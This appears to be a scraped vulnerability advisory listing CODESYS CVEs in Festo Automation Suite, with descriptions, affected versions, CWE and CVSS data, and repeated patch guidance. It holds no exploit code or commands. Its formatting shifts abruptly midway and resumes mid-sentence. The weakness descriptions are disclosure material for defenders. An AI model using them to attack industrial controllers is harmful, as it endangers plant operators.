View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-47384 An authenticated remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. 
To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-47385 An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpAppForce Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution. 
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-47386 An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. 
To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-47387 An authenticated remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution. 
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-47388 An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. 
Affected Products (identical for every CVE record below)
CODESYS in Festo Automation Suite
Vendor: FESTO, CODESYS
Product Versions:
  - FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*
  - FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*
  - FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*
  - FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*
Product Status: known_affected

Remediations (identical for every CVE record below)
Mitigation: FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk.
Mitigation: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate these vulnerabilities customers are advised to:
  - Download the latest, patched version of Codesys directly from the official Codesys website.
  - Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied.
  - Regularly monitor Codesys security advisories and apply updates promptly.
  - Keep the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.
Mitigation: The following product version has been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 is the fixed version for all CVEs.
Mitigation: For more information see the associated Festo SE & Co. KG security advisory FSA-202601 (Several CODESYS vulnerabilities in Festo Automation Suite):
  - CSAF: https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json
  - HTML: https://certvde.com/en/advisories/VDE-2025-108

Preceding entry (continued)
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS version 3.1, base score 8.8, base severity HIGH, vector string CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2022-47389
An authenticated, remote attacker may use a stack-based out-of-bounds write vulnerability in the CmpTraceMgr component of multiple CODESYS products in multiple versions to write data into the stack, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS version 3.1, base score 8.8, base severity HIGH, vector string CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2022-47390
An authenticated, remote attacker may use a stack-based out-of-bounds write vulnerability in the CmpTraceMgr component of multiple CODESYS products in multiple versions to write data into the stack, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS version 3.1, base score 8.8, base severity HIGH, vector string CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2022-47391
In multiple CODESYS products in multiple versions an unauthorized, remote attacker may use an improper input validation vulnerability to read from invalid addresses, leading to a denial of service.
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS version 3.1, base score 7.5, base severity HIGH, vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2022-47392
An authenticated, remote attacker may use an improper input validation vulnerability in the CmpApp/CmpAppBP/CmpAppForce components of multiple CODESYS products in multiple versions to read from an invalid address, which can lead to a denial-of-service condition.
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS version 3.1, base score 6.5, base severity MEDIUM, vector string CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2022-47393
An authenticated, remote attacker may use an Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in multiple versions of multiple CODESYS products to force a denial-of-service situation.
Relevant CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
Metrics: CVSS version 3.1, base score 6.5, base severity MEDIUM, vector string CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2023-3662
In CODESYS Development System versions from 3.5.17.0 and prior to 3.5.19.20 a vulnerability allows for execution of binaries from the current working directory in the user's context.
Relevant CWE: CWE-427 Uncontrolled Search Path Element
Metrics: CVSS version 3.1, base score 7.3, base severity HIGH, vector string CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVE-2023-3663
In CODESYS Development System versions from 3.5.11.20 and before 3.5.19.20 a missing integrity check might allow an unauthenticated remote attacker to manipulate the content of notifications received via HTTP by the CODESYS notification server.
Relevant CWE: CWE-940 Improper Verification of Source of a Communication Channel
Metrics: CVSS version 3.1, base score 8.8, base severity HIGH, vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2023-3669
A missing brute-force protection in CODESYS Development System prior to 3.5.19.20 allows a local attacker to have unlimited attempts at guessing the password within an import dialog.
Relevant CWE: CWE-307 Improper Restriction of Excessive Authentication Attempts
Metrics: CVSS version 3.1, base score 3.3, base severity LOW, vector string CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

CVE-2023-3670
In CODESYS Development System 3.5.9.0 to 3.5.17.0 and CODESYS Scripting 4.0.0.0 to 4.1.0.0 unsafe directory permissions would allow an attacker with local access to the workstation to place potentially harmful and disguised scripts that could be executed by legitimate users.
Relevant CWE: CWE-668 Exposure of Resource to Wrong Sphere
Metrics: CVSS version 3.1, base score 7.3, base severity HIGH, vector string CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVE-2023-37545
In multiple Codesys products in multiple versions, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37546, CVE-2023-37547, CVE-2023-37548, CVE-2023-37549 and CVE-2023-37550.
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS version 3.1, base score 6.5, base severity MEDIUM, vector string CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2023-37546
In multiple Codesys products in multiple versions, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37545, CVE-2023-37547, CVE-2023-37548, CVE-2023-37549 and CVE-2023-37550.
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS version 3.1, base score 6.5, base severity MEDIUM, vector string CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2023-37547
In multiple Codesys products in multiple versions, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37545, CVE-2023-37546, CVE-2023-37548, CVE-2023-37549 and CVE-2023-37550.
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS version 3.1, base score 6.5, base severity MEDIUM, vector string CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2023-37548
In multiple Codesys products in multiple versions, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37545, CVE-2023-37546, CVE-2023-37547, CVE-2023-37549 and CVE-2023-37550.
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS version 3.1, base score 6.5, base severity MEDIUM, vector string CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2023-37549
In multiple Codesys products in multiple versions, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37545, CVE-2023-37546, CVE-2023-37547, CVE-2023-37548 and CVE-2023-37550.
KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37550 In multiple Codesys products in multiple versions, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37545, CVE-2023-37546, CVE-2023-37547, CVE-2023-37548 and CVE-2023-37549. 
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37551 In multiple Codesys products in multiple versions, after successful authentication as a user, specially crafted network communication requests can utilize the CmpApp component to download files with any file extensions to the controller. In contrast to the regular file download via CmpFileTransfer, no filtering of certain file types is performed here. As a result, the integrity of the CODESYS control runtime system may be compromised by the files loaded onto the controller. 
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-552 Files or Directories Accessible to External Parties Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N CVE-2023-37552 In multiple versions of multiple Codesys products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37553, CVE-2023-37554, CVE-2023-37555 and CVE-2023-37556. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be 
downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37553 In multiple versions of multiple Codesys products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37552, CVE-2023-37554, CVE-2023-37555 and CVE-2023-37556. 
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
